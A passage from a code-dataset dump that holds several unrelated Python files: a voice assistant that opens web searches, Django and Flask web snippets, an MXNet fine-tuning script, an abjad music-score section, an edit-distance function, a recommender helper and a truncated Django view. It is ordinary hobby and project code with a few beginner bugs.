Gandhi, former Prime Minister of India. It is the only airport in India ranking in AirHelp list of top 10 airports in the world')\r\n\r\n elif 'stop' in query:\r\n speak(\"Thank You I am going to sleep now\")\r\n break\r\n\r\n elif 'what' and 'time' in query:\r\n now = datetime.datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n print(\"Current Time =\", current_time)\r\n speak(current_time)\r\n\r\n elif 'wikipedia' in query:\r\n speak(\"Searching Wikipedia......\")\r\n query = query.replace(\"wikipedia\",\" \")\r\n results = wikipedia.summary(query,sentences=2)\r\n speak(\"According to wikipedia.....\")\r\n print(results)\r\n speak(results)\r\n\r\n elif 'open youtube' in query:\r\n speak(\"Opening youtube in few seconds\")\r\n webbrowser.open(\"youtube.com\")\r\n\r\n elif 'search' and 'youtube' in query:\r\n query=query.replace(\"youtube\",\" \")\r\n query=query.replace(\"search\",\" \")\r\n query=query.replace(\"in\",\" \")\r\n speak(\"searching your query in youtube Give me a second\")\r\n webbrowser.open(\"https://www.youtube.com/results?search_query=\"+query)\r\n \r\n elif 'open google' in query:\r\n speak(\"Opening Google in few seconds\")\r\n webbrowser.open(\"google.com\")\r\n\r\n elif 'search' and 'google' in query:\r\n query=query.replace(\"google\",\" \")\r\n query=query.replace(\"search\",\" \")\r\n query=query.replace(\"in\",\" \")\r\n speak(\"searching your query in google Give me a second\")\r\n webbrowser.open(\"https://www.google.com/search?client=firefox-b-d&q=\"+query)\r\n\r\n \r\n\r\n \r\n \r\n \r\n","sub_path":"final jarvis.py","file_name":"final jarvis.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"545036884","text":"__author__ = 'prism'\n__date__ = '30 May, 2015'\n\nfrom django.conf.urls import include, url\nfrom .views import Login, Logout\n\n\nurlpatterns = [\n url(r'^$', Login.as_view(), name='auth'),\n url(r'^logout/$', Logout.as_view()),\n]\n","sub_path":"mail/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"370944751","text":"'''\nadopted from flask+redis example\nhttp://flask.pocoo.org/snippets/71/\n'''\nfrom datetime import datetime\nimport time\nfrom flask import Flask, request\nfrom redis import Redis\n\napp = Flask(__name__)\napp.debug = True\n\napp.config['REDIS_HOST'] = '127.0.0.1'\napp.config['REDIS_PORT'] = 6379\napp.config['REDIS_DB'] = 0\n\nredis = Redis()\n\ndef mark_online(uid=None):\n '''\n add visitors to redis cache\n '''\n try:\n now = int(time.time())\n expires = now + (360)\n all_users_key = 'online-users/{}'.format(now)\n print('debug all_users_key {}'.format(all_users_key))\n user_key = 'user-activity/{}'.format(uid)\n p = redis.pipeline()\n p.sadd(all_users_key, uid)\n p.set(user_key, now)\n p.expireat(all_users_key, expires)\n p.expireat(user_key, expires)\n print('debug user_key {}'.format(user_key))\n p.execute()\n except Exception as error:\n print('debug: mark_online err {}'.format(error))\n\ndef get_user_last_activity(uid):\n '''\n display active users in redis cache\n '''\n last_active = redis.get('user-activity/{}'.format(uid))\n if last_active is None:\n return None\n return datetime.utcfromtimestamp(int(last_active))\n\n@app.route('/')\ndef index():\n '''\n default page and recorder of visitor\n '''\n mark_online(request.remote_addr)\n return('Hello from Flask! {}+{}'\n ).format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n request.remote_addr)\n\n@app.route('/activity')\ndef active():\n '''\n get last users\n '''\n return('activity of visitors {}'\n ).format(get_user_last_activity(request.remote_addr))\n","sub_path":"cloud-init/pt.py","file_name":"pt.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"385336659","text":"from mxnet.gluon.model_zoo import vision as models\n\nimport d2lzh as d2l\nfrom mxnet import gluon, init, nd\nfrom mxnet.gluon import data as gdata, loss as gloss, model_zoo, nn\nfrom mxnet.gluon import utils as gutils\nimport os\nimport zipfile\n\ndata_dir = './data'\n# base_url = 'https://apache-mxnet.s3-accelerate.amazonaws.com/'\n# fname = gutils.download(\n# base_url + 'gluon/dataset/hotdog.zip',\n# path=data_dir, sha1_hash='fba480ffa8aa7e0febbb511d181409f899b9baa5')\n# with zipfile.ZipFile(fname, 'r') as z:\n# z.extractall(data_dir)\n\n\ntrain_imgs = gdata.vision.ImageFolderDataset(\n os.path.join(data_dir, 'hotdog/train'))\ntest_imgs = gdata.vision.ImageFolderDataset(\n os.path.join(data_dir, 'hotdog/test'))\n\nhotdogs = [train_imgs[i][0] for i in range(8)]\nnot_hotdogs = [train_imgs[-i - 1][0] for i in range(8)]\nd2l.show_images(hotdogs + not_hotdogs, 2, 8, scale=1.4);\n\n\n# 指定RGB三个通道的均值和方差来将图像通道归一化\nnormalize = gdata.vision.transforms.Normalize(\n [0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\ntrain_augs = gdata.vision.transforms.Compose([\n gdata.vision.transforms.RandomResizedCrop(224),\n gdata.vision.transforms.RandomFlipLeftRight(),\n gdata.vision.transforms.ToTensor(),\n normalize])\n\ntest_augs = gdata.vision.transforms.Compose([\n gdata.vision.transforms.Resize(256),\n gdata.vision.transforms.CenterCrop(224),\n gdata.vision.transforms.ToTensor(),\n normalize])\n\n\n\npretrained_net = models.resnet18_v2(pretrained=True)\n\n\n# print(pretrained_net.output)\n\nfinetune_net = model_zoo.vision.resnet18_v2(classes=2)\nfinetune_net.features = pretrained_net.features\nfinetune_net.output.initialize(init.Xavier())\n# output中的模型参数将在迭代中使用10倍大的学习率\nfinetune_net.output.collect_params().setattr('lr_mult', 10)\n\n\n\n# print(nn.Flatten())\n\n# def train_fine_tuning(net, learning_rate, batch_size=128, num_epochs=5):\n# train_iter = gdata.DataLoader(\n# train_imgs.transform_first(train_augs), batch_size, shuffle=True)\n# test_iter = gdata.DataLoader(\n# test_imgs.transform_first(test_augs), batch_size)\n# ctx = d2l.try_all_gpus()\n# net.collect_params().reset_ctx(ctx)\n# net.hybridize()\n# loss = gloss.SoftmaxCrossEntropyLoss()\n# trainer = gluon.Trainer(net.collect_params(), 'sgd', {\n# 'learning_rate': learning_rate, 'wd': 0.001})\n# d2l.train(train_iter, test_iter, net, loss, trainer, ctx, num_epochs)\n#\n# train_fine_tuning(finetune_net, 0.01)\n\n\n\n\n# scratch_net = model_zoo.vision.resnet18_v2(classes=2)\n# scratch_net.initialize(init=init.Xavier())\n# train_fine_tuning(scratch_net, 0.1)\n","sub_path":"old_practice/12fine_tuning.py","file_name":"12fine_tuning.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"140228537","text":"import abjad\nimport baca\n\nfrom harmony import library\n\n#########################################################################################\n######################################### 08 [H] ########################################\n#########################################################################################\n\n\ndef make_empty_score():\n score = library.make_empty_score()\n voices = baca.section.cache_voices(score, library.voice_abbreviations)\n time_signatures = [\n (3, 4),\n (4, 4),\n (3, 4),\n (4, 4),\n (3, 4),\n (4, 4),\n (1, 4),\n (3, 4),\n (3, 4),\n ]\n time_signatures = baca.section.wrap(time_signatures)\n return score, voices, time_signatures\n\n\ndef GLOBALS(skips, rests, first_measure_number):\n stage_markup = (\n (\"[H.1-6]\", 1),\n (\"[H.7-8]\", 8),\n )\n baca.section.label_stage_numbers(skips, stage_markup)\n for index, item in (\n (1 - 1, \"96\"),\n (1 - 1, \"5:3(4)=4\"),\n ):\n skip = skips[index]\n baca.metronome_mark(skip, item, manifests=library.manifests)\n baca.open_volta(skips[8 - 1], first_measure_number)\n for index, string in ((7 - 1, \"short\"),):\n baca.global_fermata(rests[index], string)\n wrappers = baca.markup(\n skips[7 - 1],\n r\"\\harmony-text-seven\",\n abjad.Tweak(r\"- \\tweak extra-offset #'(4 . -30)\"),\n )\n baca.tags.wrappers(wrappers, baca.tags.NOT_PARTS)\n\n\ndef BFL(voice, time_signatures):\n music = baca.make_mmrests(time_signatures(1, 7))\n voice.extend(music)\n durations = [_.duration for _ in time_signatures(8, 9)]\n durations = [sum(durations)]\n weights = abjad.durations([(2, 4), (2, 4), (2, 4)])\n durations = abjad.sequence.split(durations, weights, cyclic=True, overhang=True)\n music = library.make_sixteenths(\n time_signatures(8, 9),\n [-8, -4, 8, -4, 8],\n denominator=None,\n do_not_rewrite_meter=True,\n durations=durations,\n extra_counts=[0, 4, 4],\n )\n voice.extend(music)\n baca.section.append_anchor_note(voice)\n\n\ndef PERC1(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 6),\n [1, -11, -1, 1, -14],\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7, 9))\n voice.extend(music)\n\n\ndef PERC2(voice, time_signatures):\n music = baca.make_notes(time_signatures(1, 6))\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7))\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef HP(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 6),\n [6, 6, 16],\n do_not_rewrite_meter=True,\n fuse=True,\n written_dotted_halves=([0, 1], 3),\n invisible=([1], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7))\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef VA(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 6),\n [12, 8, 8],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([1, 2], 3),\n invisible=([2], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef VC1(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1),\n [4, 4, 4],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(2, 6),\n [8, 8, 12],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([0, 1], 3),\n invisible=([1], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef VC2(voice, time_signatures):\n durations = [_.duration for _ in time_signatures(1, 2)]\n durations = [sum(durations)]\n weights = abjad.durations([(3, 4), (4, 4)])\n durations = abjad.sequence.split(durations, weights, cyclic=True, overhang=True)\n music = library.make_sixteenths(\n time_signatures(1, 2),\n [\"+\", 1],\n do_not_rewrite_meter=True,\n durations=durations,\n written_wholes=[1],\n invisible=[-1],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(3, 6),\n [12, 8, 8],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([1, 2], 3),\n invisible=([2], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef CB1(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 3),\n [4, 4, 8, 4, 4, 8, 4, 4],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(4, 6),\n [8, 8, 12],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([0, 1], 3),\n invisible=([1], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef CB2(voice, time_signatures):\n music = library.make_sixteenths(\n time_signatures(1, 4),\n [12, 16, 12, 15, 1],\n fuse=True,\n do_not_rewrite_meter=True,\n written_wholes=[-2],\n invisible=[-1],\n )\n voice.extend(music)\n music = library.make_sixteenths(\n time_signatures(5, 6),\n [12, 8, 8],\n do_not_rewrite_meter=True,\n fuse=True,\n written_wholes=([1, 2], 3),\n invisible=([2], 3),\n )\n voice.extend(music)\n music = baca.make_mmrests(time_signatures(7), head=voice.name)\n voice.extend(music)\n music = baca.make_notes(time_signatures(8, 9))\n voice.extend(music)\n\n\ndef bfl(m):\n with baca.scope(m.get(8, 9)) as o:\n baca.pitch(o, \"Ab3\")\n baca.dynamic(o.phead(0), \"mf\")\n baca.dls_staff_padding(o, 4)\n with baca.scope(baca.select.rleak(o.leaves()[1:])) as u:\n baca.covered_spanner(\n u,\n abjad.Tweak(r\"- \\tweak staff-padding 5.5\"),\n right_broken=True,\n )\n baca.metric_modulation_spanner(\n u,\n abjad.Tweak(r\"- \\tweak staff-padding 8\"),\n right_broken=True,\n )\n\n\ndef perc1(m):\n with baca.scope(m.get(1, 6)) as o:\n baca.staff_lines(o.leaf(0), 1)\n library.brake_drum_staff_position(o)\n baca.dynamic(\n o.phead(0),\n \"f-ancora\",\n abjad.Tweak(r\"- \\tweak self-alignment-X -0.75\"),\n abjad.Tweak(r\"- \\tweak X-extent #'(0 . 0)\"),\n )\n baca.dls_staff_padding(o, 6)\n baca.markup(\n o.pleaf(0),\n r\"\\baca-brake-drum-markup\",\n abjad.Tweak(r\"- \\tweak staff-padding 6\"),\n )\n\n\ndef perc2(m):\n with baca.scope(m.get(1, 6)) as o:\n library.tam_tam_staff_position(o)\n baca.flat_glissando(\n o,\n hide_middle_stems=True,\n left_broken=True,\n )\n baca.stem_tremolo(o.pleaf(-1))\n with baca.scope(m.get(8, 9)) as o:\n library.tam_tam_staff_position(o)\n baca.flat_glissando(o, hide_middle_stems=True)\n baca.stem_tremolo(abjad.select.get(o.pleaves(), [0, -1]))\n baca.dynamic(o.phead(0), \"pp\")\n baca.dls_staff_padding(o, 6)\n\n\ndef hp(cache):\n name = \"hp\"\n m = cache[name]\n with baca.scope(m.get(1, 6)) as o:\n baca.clef(o.leaf(0), \"treble\")\n baca.staff_lines(o.leaf(0), 5)\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-bisb-markup\",\n abjad.Tweak(r\"- \\tweak staff-padding 5\"),\n )\n with baca.scope(m[1]) as o:\n baca.hairpin(\n o.rleaves(),\n \"p < mf > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[3]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[5]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(8, 9)) as o:\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(8, 9)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.dynamic(o.phead(0), \"pp\")\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef va(cache):\n name = \"va\"\n m = cache[name]\n with baca.scope(m.get(1, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.dynamic(o.phead(0), \"p\")\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[2]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < mf > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n\n\ndef vc1(cache):\n name = \"vc1\"\n m = cache[name]\n with baca.scope(m[1]) as o:\n # TODO: promote into rhythm:\n baca.repeat_tie(o.leaf(0))\n baca.pitch(o, \"Bb4\")\n baca.espressivo(o.pheads()[1:])\n baca.metric_modulation_spanner(\n o.rleaves(),\n abjad.Tweak(r\"- \\tweak bound-details.right.padding 4.5\"),\n abjad.Tweak(r\"- \\tweak staff-padding 5.5\"),\n left_broken=True,\n )\n with baca.scope(m.get(2, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[2]) as o:\n baca.hairpin(\n o.rleaves(),\n \"p < mf > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(2, 9)) as o:\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef vc2(cache):\n name = \"vc2\"\n m = cache[name]\n with baca.scope(m.get(1, 2)) as o:\n # TODO: promote into rhythm:\n baca.repeat_tie(o.leaf(0))\n baca.pitch(o, \"B2\")\n baca.hairpin(\n o.leaves()[-2:],\n \"(p) >o\",\n bookend=False,\n )\n baca.damp_spanner(\n o.rleaves(),\n abjad.Tweak(r\"- \\tweak bound-details.right.padding 4.5\"),\n abjad.Tweak(r\"- \\tweak staff-padding 3\"),\n left_broken=True,\n )\n with baca.scope(m.get(3, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[3]) as o:\n baca.dynamic(o.phead(0), \"p\")\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(3, 9)) as o:\n baca.clef(o.leaf(0), \"treble\")\n baca.pitch(o, \"\")\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef cb1(cache):\n name = \"cb1\"\n m = cache[name]\n with baca.scope(m.get(1, 3)) as o:\n baca.repeat_tie(o.leaf(0))\n baca.pitch(o, \"Bb4\", do_not_transpose=True)\n baca.espressivo(o.pheads()[1:])\n with baca.scope(m.get(4, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[4]) as o:\n baca.hairpin(\n o.rleaves(),\n \"p < f > p\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(4, 9)) as o:\n baca.pitch(o, \"\", do_not_transpose=True)\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef cb2(cache):\n name = \"cb2\"\n m = cache[name]\n with baca.scope(m.get(1, 4)) as o:\n baca.pitch(o, \"Bb2\")\n baca.hairpin(o.leaves()[-2:], \"(p) >o\", bookend=False)\n baca.damp_spanner(\n o.rleaves(),\n abjad.Tweak(r\"- \\tweak bound-details.right.padding 4.5\"),\n abjad.Tweak(r\"- \\tweak staff-padding 3\"),\n left_broken=True,\n )\n with baca.scope(m.get(5, 6)) as o:\n baca.stem_tremolo(o.pleaves())\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n with baca.scope(m[5]) as o:\n baca.dynamic(o.phead(0), \"p\")\n with baca.scope(m[6]) as o:\n baca.hairpin(\n o.rleaves(),\n \"(p) < ff >o niente\",\n pieces=baca.select.lparts(o.rleaves(), [1, 1 + 1]),\n )\n with baca.scope(m.get(5, 9)) as o:\n baca.clef(o.leaf(0), \"treble\")\n baca.pitch(o, \"\", do_not_transpose=True)\n cache.rebuild()\n m = cache[name]\n with baca.scope(m.get(1, 9)) as o:\n baca.dls_staff_padding(o, 4)\n\n\ndef composites(cache):\n for name in [\"va\", \"vc1\", \"vc2\", \"cb1\", \"cb2\"]:\n m = cache[name]\n with baca.scope(m.get(8, 9)) as o:\n baca.note_head_style_harmonic(o.pleaves())\n baca.stem_tremolo(o.pleaves())\n baca.dynamic(o.phead(0), \"pp\")\n baca.markup(\n o.pleaf(0),\n r\"\\baca-quasi-bisb-ancora-markup\",\n abjad.Tweak(r\"- \\tweak padding 1.5\"),\n )\n\n\n@baca.build.timed(\"make_score\")\ndef make_score(first_measure_number, previous_persistent_indicators):\n score, voices, time_signatures = make_empty_score()\n baca.section.set_up_score(\n score,\n time_signatures(),\n append_anchor_skip=True,\n always_make_global_rests=True,\n first_measure_number=first_measure_number,\n manifests=library.manifests,\n score_persistent_indicators=previous_persistent_indicators[\"Score\"],\n )\n GLOBALS(score[\"Skips\"], score[\"Rests\"], first_measure_number)\n BFL(voices(\"bfl\"), time_signatures)\n PERC1(voices(\"perc1\"), time_signatures)\n PERC2(voices(\"perc2\"), time_signatures)\n HP(voices(\"hp\"), time_signatures)\n VA(voices(\"va\"), time_signatures)\n VC1(voices(\"vc1\"), time_signatures)\n VC2(voices(\"vc2\"), time_signatures)\n CB1(voices(\"cb1\"), time_signatures)\n CB2(voices(\"cb2\"), time_signatures)\n baca.section.reapply_persistent_indicators(\n voices,\n previous_persistent_indicators,\n manifests=library.manifests,\n )\n cache = baca.section.cache_leaves(\n score,\n len(time_signatures()),\n library.voice_abbreviations,\n )\n bfl(cache[\"bfl\"])\n perc1(cache[\"perc1\"])\n perc2(cache[\"perc2\"])\n hp(cache)\n va(cache)\n vc1(cache)\n vc2(cache)\n cb1(cache)\n cb2(cache)\n composites(cache)\n return score\n\n\ndef main():\n environment = baca.build.read_environment(__file__, baca.build.argv())\n score = make_score(\n environment.first_measure_number,\n environment.previous_metadata[\"persistent_indicators\"],\n environment.timing,\n )\n metadata = baca.section.postprocess_score(\n score,\n environment,\n library.manifests,\n always_make_global_rests=True,\n empty_fermata_measures=True,\n global_rests_in_topmost_staff=True,\n parts_metric_modulation_multiplier=(0.525, 0.525),\n transpose_score=True,\n )\n baca.tags.deactivate(\n score,\n *baca.tags.instrument_color_tags(),\n *baca.tags.short_instrument_name_color_tags(),\n baca.tags.RHYTHM_ANNOTATION_SPANNER,\n )\n baca.tags.activate(\n score,\n baca.tags.LOCAL_MEASURE_NUMBER,\n baca.tags.STAGE_NUMBER,\n )\n lilypond_file = baca.lilypond.file(\n score,\n include_layout_ly=True,\n includes=[\"../stylesheet.ily\"],\n )\n baca.build.persist_lilypond_file(\n environment.arguments,\n environment.section_directory,\n environment.timing,\n lilypond_file,\n metadata,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"harmony/sections/08/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":18216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"611484431","text":"def solution(str1, str2):\n \"\"\"\n 动态规划求解\n :param str1:\n :param str2:\n :return:\n \"\"\"\n str1_length = len(str1)\n str2_length = len(str2)\n \n # 初始化矩阵\n matrix = [[0 for _ in range(str2_length)] for _ in range(str1_length)]\n \n # 初始化边界\n for i in range(str1_length):\n matrix[i][0] = i\n for j in range(str2_length):\n matrix[0][j] = j\n print(matrix)\n \n # 动态规划求解\n for i in range(1, str1_length):\n for j in range(1, str2_length):\n # 如果结尾相同\n if str1[i] == str2[j]:\n matrix[i][j] = matrix[i - 1][j - 1]\n # 如果结尾不同\n else:\n matrix[i][j] = min(matrix[i - 1][j] + 1,\n matrix[i][j - 1] + 1,\n matrix[i - 1][j - 1] + 1)\n \n return matrix[-1][-1]\n\n\nif __name__ == '__main__':\n result = solution('bcd', 'abcde')\n print(result)\n","sub_path":"solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"610946227","text":"import pandas as pd\nimport numpy as np\nfrom IPython.display import clear_output\n\n\ndef get_new_user_matrix(item_df, user_df, rank=50):\n \"\"\"\n Take in a new users ratings, align with the existing item\n factors,and return the user factors\n Args:\n item_df: item factors dataframe resulting from a Spark\n Alternating Least Squares (ALS) Model\n user_df: Pandas dataframe with item_ids and ratings\n Returns:\n new_user_matrix: np.array with calculated new users factors.\n \"\"\"\n # User ratings array\n all_ratings_array = np.array((user_df.rating.tolist(),)).T\n\n # Item factors array\n all_items_array = np.zeros(shape=(user_df.shape[0], rank))\n\n for index, item in user_df.iterrows():\n all_items_array[index, :] = np.array(\n item_df.loc[item_df[\"item_id\"] == item[\"item_id\"].astype(str), \"features\"].item()\n )\n\n # Least squares solution to get user features\n new_user_matrix = np.linalg.lstsq(all_items_array,\n all_ratings_array,\n rcond=None)\n\n # New users matrix!\n new_user_matrix = new_user_matrix[0].reshape((50,))\n\n return new_user_matrix\n\n\ndef get_user_reviews_testing(items_df):\n \"\"\"Take user input and create dataframe added for recommending,\n built for testing in Jupyter Notebook\n Args:\n None\n Returns:\n pd.DataFrame(reviews): Pandas dataframe of users reviews from inputs\n \"\"\"\n # Load data and get random sample of movies with more than 100 reviews\n movie_rand_sample = items_df[\n (items_df[\"item_id\"].astype(str).str.endswith(\"44\")) &\n (items_df[\"count\"] > 50)\n ].sample(n=25)\n reviews = []\n # Give a user input and movie title and take in score\n for index, movie in movie_rand_sample.iterrows():\n print(movie[\"title\"])\n rating = input(\n \"How would you rate this movie? (0-5, OR type 'skip'): \"\n )\n # If user has not seen, can enter skip instead\n if rating == \"skip\":\n clear_output()\n continue\n # Creating dictionary of review and adding to reviews\n else:\n movie_rating = {\"rating\": int(rating), \"item_id\": movie[\"item_id\"]}\n reviews.append(movie_rating)\n clear_output()\n if len(reviews) >= 10:\n return pd.DataFrame(reviews)\n else:\n continue\n\n\ndef get_recommendations(item_factors_df, new_user_df):\n \"\"\"Get recommendations for new user,\n built for testing in Jupyter Notebook\n Args:\n new_user_df: Pandas dataframe with user reviews,\n as generated from get_user_reviews function\n Returns:\n Prints top three recommended comics for new user\n \"\"\"\n user_matrix = get_new_user_matrix(item_factors_df, new_user_df)\n\n item_factors_df[\"new_user_predictions\"] = item_factors_df[\"features\"]\\\n .apply(\n lambda x: np.dot(x, user_matrix)\n )\n\n top_five_comics = item_factors_df.loc[\n item_factors_df[\"item_id\"].astype(str).str.endswith(\"22\"),\n [\"item_id\", \"title\", \"asin\", \"new_user_predictions\"],\n ].sort_values(\"new_user_predictions\", ascending=False)[:5]\n\n return top_five_comics\n","sub_path":"batcave/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"386894820","text":"import datetime\nimport smtplib\nimport ssl\n\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import ListView\n\nfrom methodist.models import Methodist\nfrom student.models import Student\nfrom teacher.models import Teacher, TopicOffer, Department, BranchOfKnowledge\nfrom theme.models import WriteWork, Record\n\n\nclass ThemeListView(ListView):\n template_name = 'themes/themes.html'\n model = WriteWork\n\n def get(self, *args, **kwargs):\n self.object_list = self.get_queryset()\n if 'mail' not in self.request.session:\n return HttpResponseRedirect('../authorization/')\n return super(ThemeListView, self).get(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['user'] = User\n all_records = Record.objects.all()\n context['all_records'] = all_records\n context['branches'] = BranchOfKnowledge.objects.all()\n context['statuses'] = dict(Record.STATUS_TITLE).values()\n year_of_work = datetime.date.today().year\n if datetime.date.today().month >= 9:\n year_of_work = year_of_work + 1\n if self.request.session['role'] == 'student':\n student = Student.objects.get(pk=self.request.session['user_id'])\n study_year = datetime.date.today().year - student.specialty.year_of_entry\n if datetime.date.today().month >= 9:\n study_year = study_year + 1\n context['object_list'] = context['object_list'].filter(year_of_work=datetime.datetime.now().year,\n teacher_offer__year_of_work=year_of_work,\n teacher_offer__year_of_study=study_year,\n teacher_offer__specialty=student.specialty_id) \\\n if type(context['object_list']) != list else context['object_list']\n faculty = Student.objects.filter(student_id=self.request.session['user_id'])[\n 0].specialty.specialty.department.faculty\n context['departments'] = Department.objects.filter(faculty=faculty)\n records = Record.objects.filter(student_id=student).values_list('work', flat=True)\n context['records'] = records\n booked_records = Record.objects.filter(status='CONFIRMED').values_list('work', flat=True)\n context['booked_records'] = booked_records\n this_stud_rec = Record.objects.filter(student_id=student)\n context['is_confirmed'] = False\n for record in this_stud_rec:\n if record.status == 'CONFIRMED':\n context['is_confirmed'] = True\n context['user_work'] = record.work_id\n elif self.request.session['role'] == 'teacher':\n user_department = 